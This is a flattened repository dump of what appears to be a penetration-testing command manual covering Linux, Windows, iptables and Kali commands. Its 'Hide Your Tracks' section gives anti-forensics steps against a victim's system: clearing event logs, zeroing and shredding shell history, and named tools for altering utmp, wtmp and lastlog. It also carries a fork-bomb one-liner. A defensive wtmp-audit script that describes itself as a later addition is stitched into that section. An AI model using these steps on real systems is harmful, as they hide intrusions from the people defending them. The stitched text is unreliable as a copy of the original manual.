ike-scan, The IKE Scanner, dostupno od 17.01.2017. na https://github.com/royhills/ike-scan 53 | 51. Wilansky E., WMIC - Take Command-line Control over WMI, dostupno od 17.01.2017. na https://msdn.microsoft.com/en-us/library/bb742610.aspx 54 | 52. TechNet, Net group, dostupno od 17.01.2017. na https://technet.microsoft.com/en-us/library/cc754051(v=ws.11).aspx 55 | 53. ComputerHope, Help with ping, winipcfg, and other network commands, dostupno od 17.01.2017. na http://www.computerhope.com/issues/ch000444.htm 56 | 54. TechNet, Systeminfo, dostupno od 17.01.2017. na https://technet.microsoft.com/en-us/library/cc771190(v=ws.11).aspx 57 | 55. Wikipedia, List of Microsoft Windows versions, dostupno od 17.01.2017. na https://en.wikipedia.org/wiki/List_of_Microsoft_Windows_versions 58 | 56. Farmer Derrick J., A Forensic Analysis Of The Windows Registry, dostupno od 17.01.2017. na http://www.forensicfocus.com/a-forensic-analysis-of-the-windows-registry 59 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Manual 2 | ====== 3 | 4 | Table of contents 5 | ================= 6 | 7 | **Linux** 8 | 9 | * [Linux Network Commands](#linux-network-commands) 10 | * [Linux System Info](#linux-system-info) 11 | * [Manipulating files](#manipulating-files) 12 | * [Linux Misc Commands](#linux-misc-commands) 13 | * [Hide Your Tracks](#hide-your-tracks) 14 | * [Linux Scripting](#linux-sripting) 15 | * [IP Tables](#ip-tables) 16 | * [Automatically run commands over SSH on many servers](#automatically-run-commands-over-ssh-on-many-servers) 17 | * [CHKCONFIG](#chkconfig) 18 | * [Kali Linux Commands](#kali-linux-commands) 19 | * [Solaris](#solaris) 20 | 21 | **Windows** 22 | 23 | - [Windows Versions](#windows-versions) 24 | - [Startup Directories](#startup-directories) 25 | - [Useful Run Commands](#useful-run-commands) 26 | - [Windows System Info 
Commands](#windows-system-info-commands) 27 | - [Windows Net_Domain Commands](#windows-net_domain-commands) 28 | - [Running Remote Commands](#running-remote-commands) 29 | - [Windows Network Commands](#windows-netowrk-commands) 30 | - [Hidden tools in Command Line](#hidden-tools-in-command-line) 31 | - [Miscellaneous Commands Windows](#miscellaneous-commands-windows) 32 | - [PsExec](#psexec) 33 | - [Terminal Services](#terminal-services) 34 | - [WMIC](#wmic) 35 | - [Powershell](#powershell) 36 | - [Windows Registry](#windows-registry) 37 | 38 | **Networking** 39 | 40 | - [Common ports](#common-ports) 41 | - [IPv4](#ipv4) 42 | - [IPv6](#ipv6) 43 | - [Cisco commands](#cisco-commands) 44 | - [SNMP](#snmp) 45 | - [Packet Capturing](#packet-capturing) 46 | - [DNS](#dns) 47 | - [VPN](#vpn) 48 | 49 | **PenTesting** 50 | 51 | - [Brute Forcing Services](#brute-forcing-services) 52 | - [Exploit Research](#exploit-research) 53 | - [Metasploit](#metasploit) 54 | - [Password Cracking](#password-cracking) 55 | 56 | **Literatura** 57 | 58 | - [References](Literatura.md) 59 | 60 | Linux Network Commands 61 | ---------------------- 62 | 63 | General networking concepts that will help you in troubleshooting networks on Linux [[26]](http://linux-training.be/linuxnet.pdf). 

    $ watch ss -tp                                    # Network connections
    $ netstat -ant                                    # TCP connections (-anu for UDP)
    $ netstat -tulpn                                  # Connections with PIDs
    $ lsof -i                                         # Established connections
    $ smb://ip/share                                  # Access a Windows SMB share (file-manager URL)
    $ share user x.x.x.x c$                           # Mount Windows share
    $ smbclient -U user \\\\ip\\share                 # SMB connect
    $ ifconfig eth# ip/cidr                           # Set IP and netmask
    $ ifconfig eth0:1 ip/cidr                         # Set virtual interface
    $ route add default gw gw_ip                      # Set GW
    $ ifconfig eth# mtu [size]                        # Change MTU size
    $ export MAC=xx:xx:xx:xx:xx:xx                    # Change MAC
    $ ifconfig int hw ether $MAC                      # Change MAC
    $ macchanger -m MAC int                           # Backtrack MAC changer
    $ iwlist int scan                                 # Built-in wifi scanner
    $ dig -x ip                                       # Domain lookup for IP
    $ host ip                                         # Domain lookup for IP
    $ host -t SRV _service._tcp.url.com               # Domain SRV lookup
    $ dig @ip domain -t AXFR                          # DNS zone transfer
    $ host -l domain namesvr                          # DNS zone transfer
    $ ip xfrm state list                              # Print existing VPN keys
    $ ip addr add ip/cidr dev eth0                    # Adds 'hidden' interface
    $ grep DHCP /var/log/messages                     # List DHCP assignments
    $ tcpkill host ip and port port                   # Block ip:port
    $ echo "1" > /proc/sys/net/ipv4/ip_forward        # Turn on IP forwarding
    $ echo "nameserver x.x.x.x" >> /etc/resolv.conf   # Add DNS server

Linux System Info
-----------------

Most common commands used to check information and configuration details about various hardware peripherals and devices.[[34]]

    $ lscpu        # Reports information about CPU and processing units
    $ lshw         # List hardware
    $ hwinfo       # Hardware information
    $ lspci        # List PCI devices
    $ lsscsi       # List SCSI devices
    $ lsusb        # List USB buses and device details
    $ inxi         # Bash script that fetches hardware details
    $ lsblk        # List block devices
    $ df           # Disk space of file systems
    $ pydf         # Python df
    $ fdisk        # Utility to modify partitions on hard drives
    $ mount        # Used to mount/unmount and view mounted file systems
    $ free         # Check RAM
    $ dmidecode    # Extracts hardware information by reading the SMBIOS data structures
    $ /proc files  # Virtual files in /proc contain information about hardware and configuration
    $ hdparm       # Gets information about SATA devices

[34]:

Linux Misc Commands
-------------------

Search commands[[25]]

    $ find -type f | xargs ls -l | cut -c 33- | sort -n    # Search for files, sorted by file size (add -r for reverse order)
    $ find -atime +32 -exec mv {} /var/archive/logs \;      # Move files that are over 1 month old

RPM commands

    $ rpm -q -a          # List all installed packages
    $ rpm -U -v *.rpm    # Upgrade packages
    $ rpm -Fvh *.rpm     # Freshen packages; this is the one to use when applying the latest fixes
    $ for i in *.rpm; do if rpm -qpl "$i" | grep -q libX; then echo "$i"; fi; done   # Find which (not installed) rpm file contains the file libX

Debian commands

    $ apt-cache search           # Search for package
    $ sudo apt-get install       # Install package from repository
    $ sudo dpkg --install        # Install package from local file
    $ sudo apt-get update        # Update package lists from repositories
    $ sudo apt-get -u upgrade    # Upgrade installed packages to latest version

Basic script functions

    $ for filename in *; do echo "$filename"; done   # Basic loop to perform something (here: print the name) against a number of files

Counting commands

    $ grep -v -e "^$" filename | wc -l                       # Count the non-empty lines in a file
    $ find . -name "*.p?" | xargs grep -v -e "^$" | wc -l    # Count the source code lines (perl)

[25]:

Manipulating files
------------------

Most frequently used Linux commands for manipulating files.[[35]]

    $ cp file1 file2      # Copies the contents of file1 into file2. If file2 does not exist, it is created
    $ cp -i file1 file2   # If file2 exists, the user is prompted before it is overwritten with the contents of file1
    $ mv file1 file2      # If file2 does not exist, file1 is renamed to file2. If file2 exists, its contents are replaced with those of file1
    $ rm file1 file2      # Deletes file1 and file2
    $ mkdir directory     # Create directories

[35]:

Hide Your Tracks
----------------

### Meterpreter [[11]]

    $ clearev   # Clear all event logs (Application, System, Security)

### Windows machines

- Download [clearlogs.exe]
- Run: clearlogs.exe -sec

NOTICE: You will need physical access to the victim's system

### Linux systems

    $ kwrite /var/log/messages   # Delete all or specific entries

NOTICE: You can use any other text editor

### Erasing the Command History

    $ more ~/.bash_history   # Command history
    $ echo $HISTSIZE         # The size of our history file
    $ export HISTSIZE=0      # Set the history file size to zero

### Shredding the History File

    $ shred -zu ~/.bash_history   # shred with the -zu switches overwrites the history file with zeros and then deletes it
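The defender's counterpart to this section, added here and not part of the manual or of its sources: the UTMP/WTMP/LASTLOG files described below are append-only binary logs, and the log modifier programs listed below leave characteristic residue (the manual itself notes that zap.c "can be detected"). The script parses a wtmp file and reports all-zero records (zap-style overwriting), timestamps that run backwards (records removed or rewritten) and a file length that is not a whole number of records. It assumes the glibc struct utmp layout on x86_64 (384-byte little-endian records); 32-bit glibc and Solaris utmpx use different layouts, and the sample wtmp it checks is constructed inline.

```python
"""Audit a wtmp/utmp file for the traces that log-modifier programs leave.

Added example, not part of the original manual or of any of its sources.
Assumes the glibc struct utmp layout on x86_64 (384-byte records,
little-endian); 32-bit glibc and Solaris utmpx use different layouts.
"""
import struct
import sys

# glibc x86_64 struct utmp: ut_type, 2 bytes padding, ut_pid, ut_line[32],
# ut_id[4], ut_user[32], ut_host[256], ut_exit (2 shorts), ut_session,
# ut_tv (sec, usec), ut_addr_v6[4], 20 unused bytes = 384 bytes.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)
EMPTY, BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 0, 2, 7, 8


def _cstr(raw):
    """Decode a NUL-padded fixed-size char array."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_records(data):
    """Yield (index, ut_type, user, line, host, tv_sec) for each full record."""
    for idx in range(len(data) // UTMP_SIZE):
        rec = data[idx * UTMP_SIZE:(idx + 1) * UTMP_SIZE]
        (ut_type, _pid, line, _ident, user, host, _term, _exit, _sess,
         tv_sec, _usec, _a0, _a1, _a2, _a3) = struct.unpack(UTMP_FMT, rec)
        yield idx, ut_type, _cstr(user), _cstr(line), _cstr(host), tv_sec


def audit_wtmp(data):
    """Return a list of (finding, record_index, detail) tuples.

    size-mismatch:   the file is not a whole number of records (truncated
                     or hand-edited); index is -1 because no record applies
    zeroed-record:   an all-zero record, the residue of overwriting an
                     entry instead of removing it
    time-regression: wtmp is append-only, so a timestamp lower than the
                     previous one means records were removed or rewritten
                     (or the clock was stepped back; check for clock
                     changes before concluding)
    """
    findings = []
    extra = len(data) % UTMP_SIZE
    if extra:
        findings.append(("size-mismatch", -1, "%d trailing bytes" % extra))
    last_ts = 0
    for idx, ut_type, user, line, host, ts in parse_records(data):
        rec = data[idx * UTMP_SIZE:(idx + 1) * UTMP_SIZE]
        if rec == b"\0" * UTMP_SIZE:
            findings.append(("zeroed-record", idx, "all bytes zero"))
            continue
        if ut_type in (BOOT_TIME, USER_PROCESS, DEAD_PROCESS):
            if ts < last_ts:
                findings.append(("time-regression", idx,
                                 "%s on %s at %d precedes previous %d"
                                 % (user or "?", line, ts, last_ts)))
            last_ts = max(last_ts, ts)
    return findings


def make_record(ut_type, user, line, host, tv_sec, pid=1000):
    """Build one record; used only to construct the sample below."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


# Constructed sample (not a real wtmp): a boot, one login/logout pair, a
# zeroed record, a record carrying an earlier timestamp than its predecessor,
# and five dangling bytes of a partial record.
SAMPLE_WTMP = b"".join([
    make_record(BOOT_TIME, "reboot", "~", "5.10.0", 1700000000, pid=0),
    make_record(USER_PROCESS, "alice", "pts/0", "10.0.0.5", 1700000100),
    make_record(DEAD_PROCESS, "", "pts/0", "", 1700000400),
    b"\0" * UTMP_SIZE,
    make_record(USER_PROCESS, "bob", "pts/1", "10.0.0.9", 1700000050),
]) + b"\0" * 5

if __name__ == "__main__":
    # Usage: python3 wtmp_audit.py [/var/log/wtmp]
    path = sys.argv[1] if len(sys.argv) > 1 else "/var/log/wtmp"
    with open(path, "rb") as fh:
        for kind, idx, detail in audit_wtmp(fh.read()):
            print("%s record %d: %s" % (kind, idx, detail))
```

On the constructed sample the audit reports the 5 trailing bytes, record 3 as zeroed and record 4 as a time regression; run against a real file, compare any time-regression finding with the host's clock-change history (NTP steps, virtualisation snapshots) before treating it as tampering, and keep a copy of wtmp off-host so that the size and record count can be compared against an independent baseline.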

### The logs [[12]]

    WTMP      # Every log on/off, with login/logout time plus tty and host
    UTMP      # Who is online at the moment
    LASTLOG   # Where did the logins come from

### Location of logs

- UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
- WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
- LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log

NOTICE: The location depends on the UNIX distribution

### Shell History

    $ mv .logout save.1
    $ echo rm .history > .logout
    $ echo rm .logout >> .logout
    $ echo mv save.1 .logout >> .logout
    # Delete .history

### Log modifier programs

    ah-1_0b.tar   # Changes the entries of accounting information
    clear.c       # Deletes entries in utmp, wtmp, lastlog and wtmpx
    cloak2.c      # Changes the entries in utmp, wtmp and lastlog
    invisible.c   # Overwrites utmp, wtmp and lastlog with predefined values
    marryv11.c    # Edit utmp, wtmp, lastlog and accounting data
    wzap.c        # Deletes entries in wtmp
    wtmped.c      # Deletes entries in wtmp
    zap.c         # Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!

NOTICE: Never delete the logs

[11]:
[clearlogs.exe]:
[12]:

Linux scripting
---------------

### Understanding bash scripting [[27]]

### Ping sweep without NMAP [[28]]

    $ for i in `seq 1 255`; do ping -c 1 10.10.10.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done
    $ for i in {1..254}; do ping -c 1 -W 1 10.1.1.$i | grep 'from'; done

### Fork bomb [[29]]

    $ :(){ :|:& };:   # forkbomb(){ forkbomb | forkbomb & }; forkbomb

### Monitor DNS [[30]]

- Takes the IP address or hostname of the DNS server to check and verifies the records defined in the array.

    <?php
    // Define defaults
    if (isset($_SERVER['argv'][1])) {
        $ns_server = $_SERVER['argv'][1];
    } else {
        echo "You need to supply a DNS server to check. Quitting.\n";
        exit;
    }
    $hosts = array("zabbix.com" => "85.113.250.92",
                   "php.net"    => "69.147.83.197");
    $failed = FALSE;
    // Do query; the server and host names are shell-quoted before reaching dig
    foreach ($hosts as $host => $ip) {
        $result = shell_exec("dig +time=1 +tries=1 +short @" . escapeshellarg($ns_server)
                             . " " . escapeshellarg($host));
        if (!preg_match('/' . preg_quote($ip, '/') . '/', (string) $result)) {
            $failed = TRUE;
        }
    }
    if ($failed) {
        echo "0\n";
    } else {
        echo "1\n";
    }
    ?>

### Monitoring NTP [[31]]

    #!/usr/local/bin/bash
    # ntptest
    # NTP test script for Zabbix monitor. Conditional return
    # of 1 = success | 0 = failed response
    HOST_QUERY=$1
    if [ "$(ntpq -pn "$HOST_QUERY" | grep -E -c '^\*')" -eq 1 ]; then
        # Sync responded, OK
        echo "1"
    else
        echo "0"
    fi

NOTICE: Works with a *nix Zabbix server

### Special shell variables to be aware of [[32]]

    $*      # Passes in all of the arguments. This is useful for FOR loops
    $?      # Gets the error code (exit() status) of the last program executed
    $$      # Gets the PID of the current shell
    $!      # Gets the PID of the last background process
    $EUID   # Gets the effective UID number of the script's execution

### Linux Iptables Firewall Shell Script For Standalone Server [[33]]

    #!/bin/bash
    # A Linux Shell Script with common rules for IPTABLES Firewall.
    # By default this script only opens ports 80, 22, 53 (input)
    # All outgoing traffic is allowed (default - output)
    # -------------------------------------------------------------------------
    # Copyright (c) 2004 nixCraft project
    # This script is licensed under GNU GPL version 2.0 or above
    # -------------------------------------------------------------------------
    # This script is part of nixCraft shell script collection (NSSC)
    # Visit http://bash.cyberciti.biz/ for more information.
    # -------------------------------------------------------------------------
    IPT="/sbin/iptables"
    SPAMLIST="blockedip"
    SPAMDROPMSG="BLOCKED IP DROP"

    echo "Starting IPv4 Wall..."
    $IPT -F
    $IPT -X
    $IPT -t nat -F
    $IPT -t nat -X
    $IPT -t mangle -F
    $IPT -t mangle -X
    modprobe ip_conntrack

    [ -f /root/scripts/blocked.ips.txt ] && BADIPS=$(grep -v -E "^#|^$" /root/scripts/blocked.ips.txt)

    PUB_IF="eth0"

    # unlimited
    $IPT -A INPUT -i lo -j ACCEPT
    $IPT -A OUTPUT -o lo -j ACCEPT

    # DROP all incoming traffic
    $IPT -P INPUT DROP
    $IPT -P OUTPUT DROP
    $IPT -P FORWARD DROP

    if [ -f /root/scripts/blocked.ips.txt ];
    then
        # create a new iptables list
        $IPT -N $SPAMLIST
        for ipblock in $BADIPS
        do
            $IPT -A $SPAMLIST -s $ipblock -j LOG --log-prefix "$SPAMDROPMSG"
            $IPT -A $SPAMLIST -s $ipblock -j DROP
        done
        $IPT -I INPUT -j $SPAMLIST
        $IPT -I OUTPUT -j $SPAMLIST
        $IPT -I FORWARD -j $SPAMLIST
    fi

    # Block new connections that do not start with SYN
    $IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Drop Sync"
    $IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -j DROP

    # Block Fragments
    $IPT -A INPUT -i ${PUB_IF} -f -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fragments Packets"
    $IPT -A INPUT -i ${PUB_IF} -f -j DROP

    # Block bad stuff
    $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
    $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL ALL -j DROP
    $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "NULL Packets"
    $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -j DROP # NULL packets
    $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
    $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "XMAS Packets"
    $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP # XMAS
    $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fin Packets Scan"
    $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN packet scans
    $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP

    # Allow full outgoing connection but no incoming stuff
    $IPT -A INPUT -i eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
    $IPT -A OUTPUT -o eth0 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

    # Allow ssh
    $IPT -A INPUT -p tcp --destination-port 22 -j ACCEPT

    # allow incoming ICMP ping pong stuff
    $IPT -A INPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
    $IPT -A OUTPUT -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT

    # Allow port 53 tcp/udp (DNS Server)
    $IPT -A INPUT -p udp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
    $IPT -A OUTPUT -p udp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT
    $IPT -A INPUT -p tcp --destination-port 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
    $IPT -A OUTPUT -p tcp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT

    # Open port 80
    $IPT -A INPUT -p tcp --destination-port 80 -j ACCEPT

    ##### Add your rules below ######

    ##### END your rules ############

    # Do not log smb/windows sharing packets - too much logging
    $IPT -A INPUT -p tcp -i eth0 --dport 137:139 -j REJECT
    $IPT -A INPUT -p udp -i eth0 --dport 137:139 -j REJECT

    # log everything else and drop
    $IPT -A INPUT -j LOG
    $IPT -A FORWARD -j LOG
    $IPT -A INPUT -j DROP

    exit 0

[27]:
[28]:
[29]:
[30]:
[31]:
[32]:
[33]:

IP Tables
---------

### Create a set named geoblock[[13]]

    $ sudo ipset create geoblock hash:net,port

### Loop that bans a list of countries from reaching the SSHD service

    for IP in $(wget -O - http://www.ipdeny.com/ipblocks/data/countries/{cn,ru,kr,pk,tw,sg,hk}.zone)
    do
        # regular ban - block port 22 for country XX
        sudo ipset add geoblock $IP,22
    done

### Preview of the list

    # sudo ipset list geoblock

### Delete whole list

    # sudo ipset destroy geoblock

### Add rules to iptables

    # sudo iptables -I INPUT -m set --match-set geoblock src,dst -j DROP

The set is of type hash:net,port, so the match needs two flags: src for the source network and dst for the destination port. With a single flag the rule loads but never matches.

### Save iptables

    # service iptables save

### Reverse function (negated match)

    # sudo iptables -A INPUT -m set ! --match-set geoblock src,dst -j DROP

### Connection States [[14]]

    # iptables -A INPUT -p tcp --dport ssh -s 10.10.10.10 -m state --state NEW,ESTABLISHED -j ACCEPT
    # iptables -A OUTPUT -p tcp --sport 22 -d 10.10.10.10 -m state --state ESTABLISHED -j ACCEPT

### Accept connections by default

    iptables --policy INPUT ACCEPT
    iptables --policy OUTPUT ACCEPT
    iptables --policy FORWARD ACCEPT

### Red Hat Linux firewall [[15]]

### IPtables Packet Flow Diagram [[16]]

![Iptables.gif](https://www.dropbox.com/s/5gwp8tk1q9hhnr4/Iptables.gif?dl=0&raw=1)

[13]:
[14]:
[15]:
[16]:

Example
-------
[[1]]

    tmpdir=${TMPDIR:-/tmp}/pssh.$$
    mkdir -p "$tmpdir"
    count=0
    pids=""
    while IFS= read -r userhost; do
        # BatchMode=yes makes ssh fail instead of prompting, so a host without key auth cannot hang the run
        ssh -n -o BatchMode=yes "$userhost" 'uname -a' > "${tmpdir}/${userhost}" 2>&1 &
        pids="$pids $!"              # remember each background ssh so it can be waited for
        count=`expr $count + 1`
    done < userhost.lst
    wait $pids                       # block until every background ssh has finished
    echo "Output for $count hosts is in $tmpdir"

[1]:

CHKCONFIG
---------

The chkconfig utility is a command-line tool that allows you to specify in which runlevel to start a selected service, as well as to list all available services along with their current setting.[[3]]

    $ chkconfig --list                              # List the services
    $ chkconfig --list service_name                 # Display the current settings for a selected service only
    $ chkconfig service_name on                     # Enable a service
    $ chkconfig --level runlevels service_name on   # Enable a service in certain runlevels only
    $ chkconfig service_name off                    # Disable a service

[3]:

Kali Linux Commands
-------------------
[[24]]

    $ apropos    # Search the manual pages (man -k)
    $ chown      # Change file owner and group
    $ chroot     # Run a command with a different root directory
    $ chkconfig  # System services (runlevel)
    $ cksum      # Print CRC checksum and byte counts
    $ clear      # Clear terminal screen
    $ cmp        # Compare two files
    $ comm       # Compare two sorted files line by line
    $ command    # Run a command, ignoring shell functions
    $ continue   # Resume the next iteration of a loop
    $ cp         # Copy one or more files to another
location 526 | $ cron # Daemon to execute scheduled commands 527 | $ crontab # Schedule a command to run at a later time 528 | $ csplit # Split a file into context-determined pieces 529 | $ cut # Divide a file into several parts 530 | $ date # Display or change the date and time 531 | $ dc # Desk Calculator 532 | $ dd # Convert and copy a file, write disk headers, boot records 533 | $ ddrescue # Data recovery tool 534 | $ declare # Declare variables and give them attributes 535 | $ df # Display free disk space 536 | $ diff # Display the differences between two files 537 | $ diff3 # Show differences among three files 538 | $ dig # DNS lookup 539 | $ dir # Briefly list directory contents 540 | $ dircolors # Colour setup for `ls’ 541 | $ dirname # Convert a full pathname to just a path 542 | $ dirs # Display list of remembered directories 543 | $ dmesg # Print kernel & driver messages 544 | $ du # Estimate file space usage 545 | $ echo # Display message on screen 546 | $ egrep # Search files for lines that match an extended expression 547 | $ eject # Eject removable media 548 | $ enable # Enable and disable builtin shell commands 549 | $ env # Environment variables 550 | $ ethtool # Ethernet card settings 551 | $ eval # Evaluate several commands/arguments 552 | $ exec # Execute a command 553 | $ exit # Exit the shell 554 | $ expect # Automate arbitrary applications accessed over a terminal 555 | $ expand # Convert tabs to spaces 556 | $ export # Set an environment variable 557 | $ expr # Evaluate expressions 558 | $ false # Do nothing, unsuccessfully 559 | $ fdformat # Low-level format a floppy disk 560 | $ fdisk # Partition table manipulator for Linux 561 | $ fg # Send job to foreground 562 | $ fgrep # Search files for lines that match a fixed string 563 | $ file # Determine file type 564 | $ find # Search for files that meet a desired criteria 565 | $ fmt # Reformat paragraph text 566 | $ fold # Wrap text to fit a specified width 567 | $ for # Expand words, and 
execute commands 568 | $ format # Format disks or tapes 569 | $ free # Display memory usage 570 | $ fsck # File system consistency check and repair 571 | $ ftp # File Transfer Protocol 572 | $ function # Define Function Macros 573 | $ fuser # Identify/kill the process that is accessing a file 574 | $ gawk # Find and Replace text within files 575 | $ getopts # Parse positional parameters 576 | $ grep # Search files for lines that match a given pattern 577 | $ groupadd # Add a user security group 578 | $ groupdel # Delete a group 579 | $ groupmod # Modify a group 580 | $ groups # Print group names a user is in 581 | $ gzip # Compress or decompress named files 582 | $ hash # Remember the full pathname of a name argument 583 | $ head # Output the first part of files 584 | $ help # Display help for a built-in command 585 | $ history # Command History 586 | $ hostname # Print or set system name 587 | $ iconv # Convert the character set of a file 588 | $ id # Print user and group id’s 589 | $ if # Conditionally perform a command 590 | $ ifconfig # Configure a network interface 591 | $ ifdown # Stop a network interface 592 | $ ifup # Start a network interface up 593 | $ import # Capture an X server screen and save the image to file 594 | $ install # Copy files and set attributes 595 | $ jobs # List active jobs 596 | $ join # Join lines on a common field 597 | $ kill # Stop a process from running 598 | $ killall # Kill processes by name 599 | $ less # Display output one screen at a time 600 | $ let # Perform arithmetic on shell variables 601 | $ ln # Create a symbolic link to a file 602 | $ local # Create variables 603 | $ locate # Find files 604 | $ logname # Print current login name 605 | $ logout # Exit a login shell 606 | $ look # Display lines beginning with a given string 607 | $ lpc # Line printer control program 608 | $ lpr # Off line print 609 | $ lprint # Print a file 610 | $ lprintd # Abort a print job 611 | $ lprintq # List the print queue 612 | $ lprm # Remove 
jobs from the print queue 613 | $ ls # List information about files 614 | $ lsof # List open files 615 | $ make # Recompile a group of programs 616 | $ man # Help manual 617 | $ mkdir # Create new folders 618 | $ mkfifo # Make FIFOs (named pipes) 619 | $ mkisofs # Create an hybrid ISO9660/JOLIET/HFS filesystem 620 | $ mknod # Make block or character special files 621 | $ more # Display output one screen at a time 622 | $ mount # Mount a file system 623 | $ mtools # Manipulate MS-DOS files 624 | $ mtr # Network diagnostics (traceroute/ping) 625 | $ mv # Move or rename files or directories 626 | $ mmv # Mass Move and rename files 627 | $ netstat # Networking information 628 | $ nice # Set the priority of a command or job 629 | $ nl # Number lines and write files 630 | $ nohup # Run a command immune to hangups 631 | $ notify-send # Send desktop notifications 632 | $ nslookup # Query Internet name servers interactively 633 | $ open # Open a file in its default application 634 | $ op # Operator access 635 | $ passwd # Modify a user password 636 | $ paste # Merge lines of files 637 | $ pathchk # Check file name portability 638 | $ ping # Test a network connection 639 | $ pkill # Stop processes from running 640 | $ popd # Restore the previous value of the current directory 641 | $ pr # Prepare files for printing 642 | $ printcap # Printer capability database 643 | $ printenv # Print environment variables 644 | $ printf # Format and print data 645 | $ ps # Process status 646 | $ pushd # Save and then change the current directory 647 | $ pwd # Print Working Directory 648 | $ quota # Display disk usage and limits 649 | $ quotacheck # Scan a file system for disk usage 650 | $ quotactl # Set disk quotas 651 | $ ram # ram disk device 652 | $ rcp # Copy files between two machines 653 | $ read # Read a line from standard input 654 | $ readarray # Read from stdin into an array variable 655 | $ readonly # Mark variables/functions as readonly 656 | $ reboot # Reboot the system 657 | 
$ rename # Rename files 658 | $ renice # Alter priority of running processes 659 | $ remsync # Synchronize remote files via email 660 | $ return # Exit a shell function 661 | $ rev # Reverse lines of a file 662 | $ rm # Remove files 663 | $ rmdir # Remove folders 664 | $ rsync # Remote file copy (Synchronize file trees) 665 | $ screen # Multiplex terminal, run remote shells via ssh 666 | $ scp # Secure copy (remote file copy) 667 | $ sdiff # Merge two files interactively 668 | $ sed # Stream Editor 669 | $ select # Accept keyboard input 670 | $ seq # Print numeric sequences 671 | $ set # Manipulate shell variables and functions 672 | $ sftp # Secure File Transfer Program 673 | $ shift # Shift positional parameters 674 | $ shopt # Shell Options 675 | $ shutdown # Shutdown or restart linux 676 | $ sleep # Delay for a specified time 677 | $ slocate # Find files 678 | $ sort # Sort text files 679 | $ source # Run commands from a file 680 | $ split # Split a file into fixed-size pieces 681 | $ ssh # Secure Shell client (remote login program) 682 | $ strace # Trace system calls and signals 683 | $ su # Substitute user identity 684 | $ sudo # Execute a command as another user 685 | $ sum # Print a checksum for a file 686 | $ suspend # Suspend execution of this shell 687 | $ symlink # Make a new name for a file 688 | $ sync # Synchronize data on disk with memory 689 | $ tail # Output the last part of file 690 | $ tar # Tape Archiver 691 | $ tee # Redirect output to multiple files 692 | $ test # Evaluate a conditional expression 693 | $ time # Measure Program running time 694 | $ times # User and system times 695 | $ touch # Change file timestamps 696 | $ top # List processes running on the system 697 | $ traceroute # Trace Route to Host 698 | $ trap # Run a command when a signal is set(bourne) 699 | $ tr # Translate, squeeze, and/or delete characters 700 | $ true # Do nothing, successfully 701 | $ tsort # Topological sort 702 | $ tty # Print filename of terminal on stdin 
703 | $ type # Describe a command 704 | $ ulimit # Limit user resources 705 | $ umask # Users file creation mask 706 | $ umount # Unmount a device 707 | $ unalias # Remove an alias 708 | $ uname # Print system information 709 | $ unexpand # Convert spaces to tabs 710 | $ uniq # Uniquify files 711 | $ units # Convert units from one scale to another 712 | $ unset # Remove variable or function names 713 | $ unshar # Unpack shell archive scripts 714 | $ until # Execute commands (until error) 715 | $ uptime # Show uptime 716 | $ useradd # Create new user account 717 | $ usermod # Modify user account 718 | $ users # List users currently logged in 719 | $ uuencode # Encode a binary file 720 | $ uudecode # Decode a file created by uuencode 721 | $ v # Verbosely list directory contents (`ls -l -b’) 722 | $ vdir # Verbosely list directory contents (`ls -l -b’) 723 | $ vi # Text Editor 724 | $ vmstat # Report virtual memory statistics 725 | $ wait # Wait for a process to complete 726 | $ watch # Execute/display a program periodically 727 | $ wc # Print byte, word, and line counts 728 | $ whereis # Search the user’s $path, man pages and source files for a program 729 | $ which # Search the user’s $path for a program file 730 | $ while # Execute commands 731 | $ who # Print all usernames currently logged in 732 | $ whoami # Print the current user id and name (`id -un’) 733 | $ wget # Retrieve web pages or files via HTTP, HTTPS or FTP 734 | $ write # Send a message to another user 735 | $ xargs # Execute utility, passing constructed argument lists 736 | $ xdg-open # Open a file or URL in the user’s preferred application 737 | $ yes # Print a string until interrupted 738 | 739 | [24]: 740 | 741 | Using the PHP pfSense Shells 742 | --------------------------------- 743 | 744 | Using the 